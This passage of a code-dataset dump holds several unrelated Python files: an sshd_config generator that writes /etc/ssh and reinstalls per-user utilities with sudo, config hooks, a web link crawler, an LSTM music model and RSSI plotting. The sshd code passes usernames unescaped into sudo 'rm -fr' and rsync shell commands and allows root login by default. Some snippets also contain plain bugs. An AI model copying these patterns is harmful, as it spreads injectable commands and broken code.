listen_address in listen_addresses:\n\t\t\tconfiguration += f'\\nListenAddress {listen_address}'\n\n\t\t# auth keys.\n\t\tconfiguration += '\\nAuthorizedKeysFile {}'.format(\".ssh/authorized_keys\")\n\n\t\t# banner.\n\t\tconfiguration += '\\nBanner .ssh/banner'\n\n\t\t# per users.\n\t\tconfiguration += '\\nChallengeResponseAuthentication no'\n\t\tfor username, info in users.items():\n\t\t\tconfiguration += f'\\n# User: {username}'\n\n\t\t\t# ip filter.\t\n\t\t\tconfiguration += f'\\nMatch User {username}'\n\n\t\t\t# authentication by password.\n\t\t\tif info[\"password_authentication\"]:\n\t\t\t\tconfiguration += '\\n PasswordAuthentication yes'\n\t\t\t\tconfiguration += '\\n PermitEmptyPasswords no'\n\t\t\telse:\n\t\t\t\tconfiguration += '\\n PasswordAuthentication no'\n\t\t\t\tconfiguration += '\\n PermitEmptyPasswords no'\n\n\t\t\t# authentication by keys.\n\t\t\tif info[\"key_authentication\"]:\n\t\t\t\tconfiguration += '\\n PubkeyAuthentication {}'.format('yes')\n\t\t\telse:\n\t\t\t\tconfiguration += '\\n PubkeyAuthentication {}'.format('no')\n\n\n\t\t\t# chroot directory.\n\t\t\tif isinstance(info[\"chroot_directory\"], str):\n\t\t\t\tconfiguration += f'\\n ChrootDirectory {info[\"chroot_directory\"]}'\n\n\t\t\t# root permission.\n\t\t\tl = \"no\"\n\t\t\tif info[\"root_permissions\"] and info[\"key_authentication\"]: l = \"prohibit-password\"\n\t\t\telif info[\"root_permissions\"]: l = \"yes\"\n\t\t\tconfiguration += f'\\n PermitRootLogin {l}'\n\n\t\t\t# connection options.\n\t\t\tconfiguration += f'\\n X11Forwarding {self.__convert_boolean__(info[\"x11_forwarding\"])}'\n\t\t\tconfiguration += f'\\n AllowTcpForwarding {self.__convert_boolean__(info[\"tcp_forwarding\"])}'\n\n\t\t\t# default options.\n\t\t\tconfiguration += f'\\n PermitTunnel {self.__convert_boolean__(info[\"permit_tunnel\"])}'\n\t\t\tconfiguration += f'\\n AllowStreamLocalForwarding {self.__convert_boolean__(info[\"allow_stream_local_forwarding\"])}'\n\t\t\tconfiguration += f'\\n GatewayPorts {self.__convert_boolean__(info[\"gateway_ports\"])}'\n\t\t\tconfiguration += f'\\n PermitTTY yes'\n\t\t\t\n\t\t\t# check ip filter.\n\t\t\tif info[\"ip_filter\"]:\n\n\t\t\t\t# match verified ips.\n\t\t\t\tconfiguration += f'\\n Match User {username} Address {self.__sum_list__(info[\"allowed_ips\"])}'\n\n\t\t\t\t# check sftp only.\n\t\t\t\tif info[\"sftp_only\"]:\n\t\t\t\t\tconfiguration += '\\n ForceCommand internal-sftp'\n\n\t\t\t\t# shell access.\n\t\t\t\telse:\n\t\t\t\t\tconfiguration += '\\n ForceCommand bash .ssh/utils/handler'\n\n\t\t\t\t# match unverified ips.\n\t\t\t\tconfiguration += f'\\n Match User {username} Address *,!{self.__sum_list__(info[\"allowed_ips\"])}'\n\t\t\t\tconfiguration += f'\\n ForceCommand .ssh/utils/log.py \"Your ip address is not authorized.\" \"Authorize your ip address to access user [{username}].\"'\n\n\t\t\t# no ip filter.\n\t\t\telse:\n\n\t\t\t\t# check sftp only.\n\t\t\t\tif info[\"sftp_only\"]:\n\t\t\t\t\tconfiguration += '\\n ForceCommand internal-sftp'\n\n\t\t\t\t# shell access.\n\t\t\t\telse:\n\t\t\t\t\tconfiguration += '\\n ForceCommand bash .ssh/utils/handler'\n\n\t\t# match none authorized users.\n\t\t#if '*all*' not in list(users.keys()):\n\t\tconfiguration += f'\\nMatch User *,!{self.__sum_list__(list(users.keys()))}'\n\t\tconfiguration += '\\n PasswordAuthentication no'\n\t\tconfiguration += '\\n PermitEmptyPasswords no'\n\t\tconfiguration += '\\n PubkeyAuthentication no'\n\t\tconfiguration += f'\\n ForceCommand .ssh/utils/log.py \"You are not authorized to access user [$USER] over ssh.\"'\n\t\tconfiguration += \"\\n\"\n\n\t\t# save sshd.\n\t\tif save:\n\t\t\tfile = File(path='/tmp/sshd_config', data=configuration)\n\t\t\tfile.file_path.delete(forced=True, sudo=True)\n\t\t\tfile.save()\n\t\t\tfp = FilePath(f\"/etc/ssh/sshd_config\")\n\t\t\tfile.file_path.copy(fp.path, sudo=True)\n\t\t\tfp.permission.set(permission=644, sudo=True)\n\t\t\tfp.ownership.set(owner=\"root\", group=None, sudo=True)\n\t\t\tos.system(\"sudo systemctl restart ssh\")\n\t\t\tif not fp.exists(sudo=True):\n\t\t\t\treturn r3sponse.error(f\"Failed to save the sshd configuration.\")\n\n\t\t# success.\n\t\treturn r3sponse.success(\"Successfully created the sshd configuration.\", {\n\t\t\t\t\"sshd\":configuration,\n\t\t\t})\n\n\t\t#\n\t# system functions.\n\tdef __sum_list__(self, list):\n\t\treturn Array(path=False, array=list).string(joiner=',')\n\tdef __convert_boolean__(self, boolean):\n\t\tif boolean: return \"yes\"\n\t\telse: return \"no\"\n\tdef __check_user_items__(self, users):\n\n\t\t# iterate.\n\t\tfor username, info in users.items():\n\t\t\t\n\t\t\t# check options.\n\t\t\ttry: info[\"root_permissions\"]\n\t\t\texcept KeyError: info[\"root_permissions\"] = True\n\t\t\ttry: info[\"password_authentication\"]\n\t\t\texcept KeyError: info[\"password_authentication\"] = False\n\t\t\ttry: info[\"key_authentication\"]\n\t\t\texcept KeyError: info[\"key_authentication\"] = True\n\t\t\ttry: info[\"ip_filter\"]\n\t\t\texcept KeyError: info[\"ip_filter\"] = False\n\t\t\ttry: \n\t\t\t\tinfo[\"allowed_ips\"]\n\t\t\t\tif not isinstance(info[\"allowed_ips\"], list):\n\t\t\t\t\treturn r3sponse.error(f\"Invalid usage, parameter [users.{username}.allowed_ips] is supposed to be a list with allowed ip addresses.\")\n\t\t\texcept KeyError: info[\"allowed_ips\"] = []\n\t\t\ttry: info[\"sftp_only\"]\n\t\t\texcept KeyError: info[\"sftp_only\"] = False\n\t\t\ttry: info[\"chroot_directory\"]\n\t\t\texcept KeyError: info[\"chroot_directory\"] = None\n\t\t\ttry: info[\"x11_forwarding\"]\n\t\t\texcept KeyError: info[\"x11_forwarding\"] = False\n\t\t\ttry: info[\"tcp_forwarding\"]\n\t\t\texcept KeyError: info[\"tcp_forwarding\"] = False\n\n\t\t# response.\n\t\treturn r3sponse.success(\"Successfully checked the user items.\")\n\n\t\t#\n\tdef __check_utils_installed__(self, usernames=[]):\n\n\t\t# iterate.\n\t\tif isinstance(usernames, str): usernames = [usernames]\n\t\tto_install = []\n\t\tfor username in usernames:\n\t\t\t\n\t\t\t# non existant.\n\t\t\tfp = FilePath(f\"{syst3m.defaults.vars.homes}{username}/.ssh/utils/.version.py\")\n\t\t\tif not fp.exists(sudo=True): \n\t\t\t\tto_install.append(username)\n\n\t\t\t# check version.\n\t\t\telse: \n\t\t\t\tversion = utils.__execute__([\"sudo\", \"cat\", fp.path])\n\t\t\t\tgithub_version = utils.__execute__([\"curl\", \"https://raw.githubusercontent.com/vandenberghinc/ssht00ls/master/ssht00ls/classes/utils/.version.py?raw=true\"])\n\t\t\t\tif str(version) != str(github_version):\n\t\t\t\t\tto_install.append(username)\n\n\t\t# install.\n\t\tif len(to_install) > 0:\n\t\t\tresponse = self.__install_utils__(to_install)\n\t\t\tif response[\"error\"] != None: return response\n\n\t\t# success.\n\t\treturn r3sponse.success(\"Successfully verified the ssht00ls utils installation.\")\n\n\t\t#\n\tdef __install_utils__(self, usernames=[]):\n\n\t\t# checks.\n\t\tif isinstance(usernames, str): usernames = [usernames]\n\t\tif len(usernames) == 0: \n\t\t\treturn r3sponse.error(\"No usernames specified.\")\n\n\t\t# create tmp lib.\n\t\tutils_lib = gfp.clean(path=f\"{SOURCE_PATH}/classes/utils/\")\n\t\tutils_tmp = \"/tmp/utils/\"\n\t\tif not os.path.exists(utils_lib):\n\t\t\traise ValueError(f\"ssht00ls library [{utils_lib}] does not exist.\")\n\t\tos.system(f\"rsync -az {utils_lib} {utils_tmp} --delete\")\n\t\tos.system(f\"rm -fr {utils_tmp}/__pycache__\")\n\t\tos.system(f\"rm -fr {utils_tmp}/__init__.py\")\n\t\tos.system(f\"rm -fr {utils_tmp}/isdir.py\")\n\t\tos.system(f\"rm -fr {utils_tmp}/size.py\")\n\t\tif not Files.exists(utils_tmp):\n\t\t\treturn r3sponse.error(\"Failed to install the ssht00ls utils (#2).\")\n\n\t\t# iterate.\n\t\tfor username in usernames:\n\n\t\t\t# check if ssh is correctly installed.\n\t\t\tresponse = installation.check_installed(username=username)\n\n\t\t\t# install the ssh correctly for the specified user.\n\t\t\tif response[\"error\"] != None:\n\t\t\t\tresponse = installation.install(username=username)\n\t\t\t\tif response[\"error\"] != None: return response\n\n\t\t\t# copy.\n\t\t\tfp = FilePath(f\"{syst3m.defaults.vars.homes}{username}/.ssh/utils/\")\n\t\t\tos.system(f\"sudo rm -fr {fp.path}\")\n\t\t\tos.system(f\"sudo rsync -az {utils_tmp} {fp.path} --delete\")\n\t\t\tfp.ownership.set(owner=username, group=None, sudo=True, recursive=True)\n\t\t\tfp.permission.set(permission=755, recursive=True, sudo=True)\n\t\t\tif not fp.exists(sudo=True):\n\t\t\t\treturn r3sponse.error(\"Failed to install the ssht00ls utils (#3).\")\n\n\t\t# success.\n\t\treturn r3sponse.success(\"Successfully installed the ssht00ls utils.\")\n\n\t\t#\n\tdef __install_banner__(self, banner=\"\", usernames=[]):\n\n\t\t# checks.\n\t\tif isinstance(usernames, str): usernames = [usernames]\n\t\tif len(usernames) == 0: \n\t\t\treturn r3sponse.error(\"No usernames specified.\")\n\n\t\t# save banner.\n\t\tfile = File(path='/tmp/banner', data=banner)\n\t\tfile.file_path.delete(forced=True, sudo=True)\n\t\tfile.save()\n\n\t\t# iterate.\n\t\tfor username in usernames:\n\t\t\tfp = FilePath(f\"/{syst3m.defaults.vars.homes}{username}/.ssh/banner\")\n\t\t\tfile.file_path.copy(fp.path, sudo=True)\n\t\t\tfp.permission.set(permission=755, sudo=True)\n\t\t\tfp.ownership.set(owner=username, group=None, sudo=True)\n\t\t\tif not fp.exists(sudo=True):\n\t\t\t\treturn r3sponse.error(f\"Failed to install the banner for user [{username}].\")\n\n\t\t# success.\n\t\treturn r3sponse.success(\"Successfully installed the banner.\")\n\n\t\t#\n\t#\n\n# Initialized classes.\nsshd = SSHD()\n\n\n\n\n\n\n","sub_path":"ssht00ls/.legacy/3.14.0/classes/sshd/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"401023112","text":"from vt_manager.communication.sfa.rspecs.elements.element import Element \nfrom vt_manager.communication.sfa.rspecs.elements.pltag import PLTag\n\nclass SFAv1PLTag:\n @staticmethod\n def add_pl_tag(xml, name, value):\n for pl_tag in pl_tags:\n pl_tag_elem = xml.add_element(name)\n pl_tag_elem.set_text(value)\n \n @staticmethod\n def get_pl_tags(xml, ignore=[]):\n pl_tags = []\n for elem in xml.iterchildren():\n if elem.tag not in ignore:\n pl_tag = PLTag({'tagname': elem.tag, 'value': elem.text})\n pl_tags.append(pl_tag) \n return pl_tags\n\n","sub_path":"vt_manager/src/python/vt_manager/communication/sfa/rspecs/elements/versions/sfav1PLTag.py","file_name":"sfav1PLTag.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"616238270","text":"from __future__ import annotations\n\nimport re\nimport time\nfrom collections import defaultdict\nfrom functools import wraps\nfrom typing import Any, Callable, Dict, Literal, TYPE_CHECKING, TypeVar, Union, Type\n\nif TYPE_CHECKING:\n from clustertools.file_objects.configs.global_config import GlobalConfig\n from clustertools.file_objects.configs.project_config import ProjectConfig\n from clustertools.shared.environ import PseudoEnviron\n from clustertools.shared.object_monitors import MonitoredEnviron, MonitoredList\n from clustertools.shared.typing import (_BoundHook,\n _CheckedVal,\n _Config,\n _Hook,\n _UncheckedVal,\n EmailAddress,\n OneOrMore,\n WallTimeStr)\n\n\nEMAIL_PATTERN = re.compile(r'^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$')\n\n\n########################################################################\n# CONFIG HOOK HELPERS #\n########################################################################\n# _T = TypeVar('_T')\n# class SimpleDefaultDict(dict):\n# # ADD DOCSTRING\n# \"\"\"\n# Similar to collections.defaultdict, but doesn't add missing keys.\n# Accepts an additional keyword-only argument 'default' that may\n# be either a default value to return for missing keys, or a\n# callable that accepts the missing key as an argument.\n#\n# Used here to provide a dummy callable hook for config fields that\n# don't require any special validation or extra work\n# \"\"\"\n# def __init__(\n# self,\n# *arg,\n# default: Union[_T, Callable[..., _T]] = None,\n# **kwargs\n# ) -> None:\n# # ADD DOCSTRING\n# if len(arg) > 1:\n# raise TypeError(\n# f\"{self.__class__.__name__} expected at most 1 argument, got \"\n# f\"{len(arg)}\"\n# )\n# super().__init__(*arg, **kwargs)\n# if callable(default):\n# self.default = default\n# else:\n# self.default = lambda key: default\n#\n# def __missing__(self, key: Any) -> _T:\n# return self.default(key)\n#\n#\n# def dummy_hook(inst: _Config, val: _T) -> _T:\n# return val\n\n\nclass ParrotDict(dict):\n def __missing__(self, key):\n return key\n\n\ndef bindable(\n func: _Hook[[_Config, _UncheckedVal], _CheckedVal]\n) -> _BoundHook[[_UncheckedVal], _CheckedVal]:\n # ADD DOCSTRING - decorates a function 'func', allowing it to be\n # bound to an object 'instance' at runtime and optionally added as\n # an instance method\n @wraps(func)\n def bind(instance: _Config) -> _BoundHook:\n return func.__get__(instance)\n\n return bind\n\n\n# def enforce_value_type(value: Any, _type: OneOrMore[Type]) -> None:\n# if not isinstance(value, _type):\n# if hasattr(_type, '__iter__'):\n# assert len(_type) == 2 # no fields should accept more than 2 types\n# t = f\"either '{_type[0].__name__}' or '{_type[1].__name__}'\"\n# else:\n# t = f\"'{_type.__name__}'\"\n# raise TypeError(\n# f\"Type of assigned value must be {t}. Received \"\n# f\"'{value.__class__.__name__}'\"\n# )\n\n\n########################################################################\n# TYPE CONVERTERS #\n########################################################################\n # Python types -> str #\ndef environ_to_str(environ: Union[Dict[str, str], PseudoEnviron]) -> str:\n str_fmt = '\\n'.join('='.join(item) for item in environ.items())\n if str_fmt != '':\n str_fmt = '\\n' + str_fmt\n return str_fmt\n\n\nto_str_funcs = {\n bool: lambda b: str(b).lower(),\n MonitoredList: lambda l: ','.join(l),\n MonitoredEnviron: environ_to_str\n}\nto_str_funcs = defaultdict(lambda: str, to_str_funcs)\n\n\ndef type_to_str(value: Any) -> str:\n return to_str_funcs[type(value)](value)\n\n\n # str -> Python types #\n@bindable\ndef str_to_environ(inst: _Config, environ_str: str) -> MonitoredEnviron:\n keys_vals = map(lambda x: x.split('='), environ_str.strip().splitlines())\n env_dict = {k.strip(): v.strip() for k, v in keys_vals}\n validate_item_hook = inst._object_validate_hooks['environ']\n post_update_hook = inst._object_post_update_hooks['environ']\n return MonitoredEnviron(initial_env=dict(),\n custom_vars=env_dict,\n validate_item_hook=validate_item_hook,\n post_update_hook=post_update_hook)\n\n\n@bindable\ndef str_to_modules(inst: _Config, modules_str: str) -> MonitoredList:\n modules_list = [m.strip() for m in modules_str.strip().split(',')]\n validate_item_hook = inst._object_validate_hooks['modules']\n post_update_hook = inst._object_post_update_hooks['modules']\n return MonitoredList(modules_list,\n validate_item_hook=validate_item_hook,\n post_update_hook=post_update_hook)\n\n\n@bindable\ndef str_to_email_list(inst: _Config, email_str: str) -> MonitoredList:\n email_list = [m.strip() for m in email_str.strip().split(',')]\n validate_item_hook = inst._object_validate_hooks['email']\n post_update_hook = inst._object_post_update_hooks['email']\n return MonitoredList(email_list,\n validate_item_hook=validate_item_hook,\n post_update_hook=post_update_hook)\n\n\nto_type_funcs = {\n 'environ': str_to_environ,\n 'modules': str_to_modules,\n 'email': str_to_email_list\n}\n\n@bindable\ndef str_to_type(\n inst: _Config,\n key: str,\n value: str\n) -> Union[str, bool, int, MonitoredEnviron[str, str], MonitoredList[str]]:\n if value == 'true':\n return True\n elif value == 'false':\n return False\n elif value.isdigit():\n return int(value)\n else:\n try:\n return inst._to_type_funcs[key]\n except KeyError:\n # then it must be a str\n return value\n\n\n########################################################################\n# MONITORED OBJECT HOOKS #\n########################################################################\n # validate_item_hooks #\ndef validate_email(email: str) -> None:\n # used by itself when individual items added to/replaced in\n # email_list and as part of 'validate_email_list' when entire field\n # is replaced\n\n is_valid = bool(email == 'INFER' or EMAIL_PATTERN.match(email))\n if not is_valid:\n raise ValueError(\n f\"{email} does not appear to be formatted as a valid email \"\n f\"address (you can pass 'infer' to use the default email address \"\n f\"for your account)\"\n )\n\n\nBASE_OBJECT_VALIDATE_HOOKS = {'email': validate_email}\n\n\n # post_update_hooks #\n@bindable\ndef environ_post_update_global(inst: GlobalConfig) -> None:\n default_environ = inst._config.project_defaults.runtime_environment.environ\n environ_str = environ_to_str(default_environ)\n inst._configparser.set('project_defaults.runtime_environment',\n 'environ',\n environ_str)\n inst.write_config_file()\n\n\n@bindable\ndef environ_post_update_project(inst: ProjectConfig) -> None:\n environ_str = environ_to_str(inst._config.runtime_environment.environ)\n inst._configparser.set('runtime_environment', 'environ', environ_str)\n inst.write_config_file()\n\n\n@bindable\ndef modules_post_update_global(inst: GlobalConfig) -> None:\n modules_str = ','.join(inst._config.project_defaults.runtime_environment.modules)\n inst._configparser.set('project_defaults.runtime_environment',\n 'modules',\n modules_str)\n inst.write_config_file()\n\n\n@bindable\ndef modules_post_update_project(inst: ProjectConfig) -> None:\n modules_str = ','.join(inst._config.runtime_environment.modules)\n inst._configparser.set('runtime_environment', 'modules', modules_str)\n inst.write_config_file()\n\n\n@bindable\ndef email_post_update_global(inst: GlobalConfig) -> None:\n emails_str = ','.join(inst._config.project_defaults.notifications.email)\n inst._configparser.set('project_defaults.notifications',\n 'email',\n emails_str)\n inst.write_config_file()\n\n\n@bindable\ndef email_post_update_project(inst: ProjectConfig) -> None:\n emails_str = ','.join(inst._config.notifications.email)\n inst._configparser.set('notifications', 'email', emails_str)\n inst.write_config_file()\n\n\nGLOBAL_OBJECT_POST_UPDATE_HOOKS = {\n 'environ': environ_post_update_global,\n 'modules': modules_post_update_global,\n 'email': email_post_update_global\n}\n\n\nPROJECT_OBJECT_POST_UPDATE_HOOKS = {\n 'environ': environ_post_update_project,\n 'modules': modules_post_update_project,\n 'email': email_post_update_project\n}\n\n\n########################################################################\n# SHARED HOOKS (BaseConfig) #\n########################################################################\n@bindable\ndef validate_job_basename(inst: _Config, new_basename: str) -> str:\n # TODO: should logic for preventing changes to attribute when\n # submission/jobs in progress be handled here or on Project object?\n if len(new_basename) > 15:\n raise ValueError(\"Job names may be up to 15 characters in length\")\n elif not new_basename[0].isalpha():\n raise ValueError(\n \"Job names must start with an alphabetic character ([a-zA-Z])\"\n )\n elif re.search('\\s', new_basename) is not None:\n raise ValueError(\"Job names may not contain whitespace\")\n return new_basename\n\n\n@bindable\ndef validate_walltime_str(inst: _Config, walltime_str: str) -> WallTimeStr:\n try:\n time.strptime(walltime_str, '%H:%M:%S')\n except ValueError:\n try:\n time.strptime(walltime_str, '%M:%S')\n except ValueError:\n raise ValueError(\n \"Malformed string value for 'wall_time'. Format should be \"\n \"'HH:MM:SS', or 'MM:SS' if requesting < 1 hour\"\n )\n return walltime_str\n\n\n@bindable\ndef monitor_modules(\n inst: _Config,\n new_modules: OneOrMore[str]\n) -> MonitoredList:\n # called when config field is *replaced*, rather than edited\n if isinstance(new_modules, str):\n new_modules = [new_modules]\n else:\n new_modules = list(new_modules)\n if isinstance(inst, GlobalConfig):\n post_update_hook = modules_post_update_global\n else:\n post_update_hook = modules_post_update_project\n return MonitoredList(new_modules,\n validate_item_hook=None,\n post_update_hook=post_update_hook(inst=inst))\n\n\n@bindable\ndef monitor_environ(inst: _Config, environ: Dict[str, str]) -> MonitoredEnviron:\n # called when setting the environ config field, rather than updating\n # individual variables\n if not all(isinstance(i, str) for i in sum(environ.items(), ())):\n raise TypeError(\"All keys and values in environ mapping must be 'str'\")\n if isinstance(inst, GlobalConfig):\n post_update_hook = environ_post_update_global\n else:\n post_update_hook = environ_post_update_project\n return MonitoredEnviron(initial_env=dict(),\n custom_vars=environ,\n validate_item_hook=None,\n post_update_hook=post_update_hook(inst=inst))\n\n\n@bindable\ndef monitor_email(\n inst: _Config,\n new_emails: OneOrMore[str]\n) -> MonitoredList[EmailAddress]:\n if isinstance(new_emails, str):\n new_emails = [new_emails]\n else:\n new_emails = list(new_emails)\n for eml in new_emails:\n validate_email(eml)\n if isinstance(inst, GlobalConfig):\n post_update_hook = email_post_update_global\n else:\n post_update_hook = email_post_update_project\n return MonitoredList(new_emails,\n validate_item_hook=validate_email,\n post_update_hook=post_update_hook(inst=inst))\n\n\nBASE_CONFIG_UPDATE_HOOKS = {\n 'job_basename': validate_job_basename,\n 'wall_time': validate_walltime_str,\n 'modules': monitor_modules,\n 'environ': monitor_environ,\n 'email': monitor_email\n}\n\n\n########################################################################\n# GLOBAL CONFIG HOOKS #\n########################################################################\n@bindable\ndef move_projects(inst: GlobalConfig, new_dir: str) -> str:\n # TODO: write me... this is a tricky one. will need to\n # inst._cluster.check_output() a 'mv' command for each project in\n # the old project_dir. Also should confirm\n # inst._cluster.is_dir(PurePosixPath(new_dir)) first\n # enforce_value_type(value=new_dir, _type=str)\n raise NotImplementedError(\"Moving project directory is not yet supported\")\n\n\n# @bindable\n# def launch_in_project_dir_hook(inst: GlobalConfig, pref: bool) -> None:\n# enforce_value_type(value=pref, _type=bool)\n\n\n@bindable\ndef validate_shell_executable(inst: GlobalConfig, new_exe: str) -> str:\n # update cluster object, which conveniently validates executable\n # enforce_value_type(value=new_exe, _type=str)\n inst._cluster.executable = new_exe\n return new_exe\n\n\n# @bindable\n# def confirm_project_deletion_hook(inst: GlobalConfig, pref: bool) -> None:\n# enforce_value_type(value=pref, _type=bool)\n\n\n@bindable\ndef check_default_prefer_value(\n inst: GlobalConfig,\n pref: Literal['local', 'remote', 'recent']\n) -> None:\n if pref not in ('local', 'remote', 'recent'):\n raise ValueError(\n \"default file syncing behavior must be either 'local', 'remote', \"\n \"or 'recent'\"\n )\n\n\nGLOBAL_CONFIG_UPDATE_HOOKS = {\n 'project_dir': move_projects,\n 'executable': validate_shell_executable,\n 'default_prefer': check_default_prefer_value,\n}\n\n\n########################################################################\n# PROJECT CONFIG HOOKS #\n########################################################################\n@bindable\ndef update_config_from_global(inst: ProjectConfig, pref: bool) -> bool:\n # TODO: write me. This one's going to take some pre-planning &\n # coordinating between ProjectConfig, Project, MonitoredEnviron,\n # TrackedAttrConfig, etc. classes\n ...\n return pref\n\n\n@bindable\ndef init_project_job_monitor(inst: ProjectConfig, pref: bool) -> bool:\n # initializes a monitor Job object on the associated Project object\n # when auto_monitor_jobs is set to True, removes it when set to False\n if pref and not inst._config.monitoring.auto_monitor_jobs:\n inst._project._init_monitor()\n elif not pref:\n inst._project._monitor_script = inst._project._monitor = None\n return pref\n\n\nPROJECT_CONFIG_UPDATE_HOOKS = {\n 'auto_monitor_jobs': init_project_job_monitor\n}\n","sub_path":"clustertools/file_objects/configs/config_helpers.py","file_name":"config_helpers.py","file_ext":"py","file_size_in_byte":15438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"315055910","text":"def f(lst,arr,dex):\n if dex==1:\n\n num=int(\"\".join(lst))\n while num!=1:\n\n\n if num%2==1:\n return\n else:\n num=num/2\n\n return True\n else:\n for i in range(0,dex):\n\n temp=lst[dex-1]\n lst[dex-1]=lst[i]\n lst[i]=temp\n if f(lst,arr,dex-1):\n return True\n\n\n\n temp = lst[dex - 1]\n lst[dex - 1] = lst[i]\n lst[i] = temp\n\n\n\n\n\n\nnum=input()\nlst=list(num)\narr=[]\nres=[]\nnum=int(num)\nif num==1:\n print('true')\nelse:\n if f(lst,arr,len(lst)):\n print('true')\n else:\n print('false')\n\n","sub_path":"Code/CodeRecords/2529/60644/245964.py","file_name":"245964.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"638388914","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport datetime\nimport random\n\npages = set()\nrandom.seed(datetime.datetime.now())\n\ndef get_internal_links(bs_object, include_url):\n internal_links = []\n for link in bs_object.findAll(\"a\", href=re.compile(\"^(/|.*\" + include_url + \")\")):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in internal_links:\n internal_links.append(link.attrs['href'])\n \n return internal_links\n\ndef get_external_links(bs_object, exclude_url):\n external_links = []\n for link in bs_object.findAll(\"a\", href=re.compile(\"^(http|www)((?!\" + exclude_url + \").)*$\")):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in external_links:\n external_links.append(link.attrs['href'])\n\n return external_links\n\ndef split_address(address):\n address_parts = address.replace(\"http://\", \"\").split(\"/\")\n return address_parts\n\ndef get_random_external_link(starting_page):\n html = urlopen(starting_page)\n bs_object = BeautifulSoup(html, \"html.parser\")\n external_links = get_external_links(bs_object, split_address(starting_page)[0])\n if len(external_links) == 0:\n internal_links = get_internal_links(starting_page)\n return get_external_links(internal_links[random.randint(0 , len(internal_links) - 1)])\n else:\n return external_links[random.randint(0, len(external_links) - 1)]\n\ndef follow_external_only(starting_site):\n external_link = get_random_external_link(starting_site)\n print(\"Random external link is: \" + external_link)\n follow_external_only(external_link)\n\n#follow_external_only(\"http://www.oreilly.com\")\n\nall_external_links = set()\nall_interanl_links = set()\n\ndef get_all_external_links(site_url):\n html = urlopen(site_url)\n bs_object = BeautifulSoup(html, \"html.parser\")\n internal_links = get_internal_links(bs_object, split_address(domain)[0])\n external_links = get_external_links(bs_object, split_address(domain)[0])\n\n for link in external_links:\n if link not in all_external_links:\n all_external_links.add(link)\n print(link)\n\n for link in internal_links:\n if link == \"/\":\n link = domain\n elif link[0:2] == \"//\":\n link = \"http:\" + link\n elif link[0:1] == \"/\":\n link = domain + link\n\ndomain = \"http://en.wikipedia.org/wiki/Kevin_Bacon\"#\"http://www.oreilly.com\"\nget_all_external_links(domain) \n\n","sub_path":"crawler/Chap3/web_scraping.py","file_name":"web_scraping.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"264598004","text":"from tensorflow.compat.v1 import keras\nfrom tensorflow.compat.v1.keras import layers\n\nBASIC_DEFAULT_MIN_NOTE = 48\nBASIC_DEFAULT_MAX_NOTE = 84\n# dimensionality of one event\nBASIC_EVENT_DIM = BASIC_DEFAULT_MAX_NOTE - BASIC_DEFAULT_MIN_NOTE + 2 # all note on events, note off, rest\nLOOKBACK_RNN_INPUT_EVENT_DIM = 120\n\n\ndef get_simple_rnn_model(event_dim, is_Training, temperature=1):\n # input_shape: (None, : different sequence lengths (per batch; every sequence in one batch does have the same dimension)\n # EVENT_DIM) : dimensionality of one event\n layer_one_args = {'units': 128,\n 'input_shape': (None, event_dim),\n 'return_sequences': True,\n 'dropout': 0.5,\n 'recurrent_dropout': 0.5,\n }\n layer_two_args = {'units': 128,\n 'return_sequences': True,\n 'dropout': 0.5,\n 'recurrent_dropout': 0.5,\n }\n # for generating\n if not is_Training:\n # we predict one by one event\n layer_one_args['input_shape'] = (1, event_dim)\n layer_one_args['batch_input_shape'] = (1, 1, event_dim)\n layer_one_args['stateful'] = True\n layer_two_args['stateful'] = True\n\n model = keras.Sequential()\n model.add(layers.LSTM(**layer_one_args))\n # second LSTM layer\n model.add(layers.LSTM(**layer_two_args))\n model.add(layers.Lambda(lambda x: x/temperature))\n model.add(layers.Dense(units=event_dim, activation='softmax'))\n\n return model\n","sub_path":"magenta/models/my_rnn/my_simple_rnn_model.py","file_name":"my_simple_rnn_model.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"540065786","text":"from matplotlib import pyplot as plt \nimport json\nimport os\nimport operator\n\nfilterMethod = \"kalman\"\n\ndata_dir = os.getcwd() + \"/beacon-all-points-\" + filterMethod + \"/\"\nf = open(os.path.join(data_dir, \"beacon.json\"),\"r\")\ndata = json.load(f)\nf.close()\n\nsave_path = os.getcwd() + \"/Graphs/rssi_vs_distance_reported/\"\nif not(os.path.isdir(save_path)) : \n\tos.mkdir(save_path)\n\ndistance = {}\nrssi = {}\nnoOfBeacons = 10\n\nfor elem in data[\"beacon\"]:\n\tfor values in elem[\"beaconData\"]:\n\t\tif values[\"id3\"] in distance :\n\t\t\tdistance[values[\"id3\"]].append(values[\"distance\"])\n\t\telse :\n\t\t\tdistance[values[\"id3\"]] = [values[\"distance\"]]\n\n\t\tif values[\"id3\"] in rssi :\n\t\t\trssi[values[\"id3\"]].append(values[\"rssi\"])\n\t\telse :\n\t\t\trssi[values[\"id3\"]] = [values[\"rssi\"]]\n\t\t\nfor beaconNo in range(1, noOfBeacons+1) :\n\tplt.figure(figsize=(16, 10))\n\tplt.title(\"Variation in RSSI vs reported distance from beacon \" + str(beaconNo)) \n\tplt.xlabel(\"Distance in meters\") \n\tplt.ylabel(\"RSSI in dBm\") \n\tsort_axis = operator.itemgetter(0)\n\tsorted_zip = sorted(zip(distance[beaconNo], rssi[beaconNo]), key=sort_axis)\n\tsort_distance, sort_rssi = zip(*sorted_zip)\n\tplt.plot(sort_distance, sort_rssi, \"-ob\") \n\tplt.grid()\n\t# plt.show()\n\tfilename = os.path.join(save_path, \"rssi_vs_distance_\" + str(beaconNo))\n\tplt.savefig(filename, dpi=200, 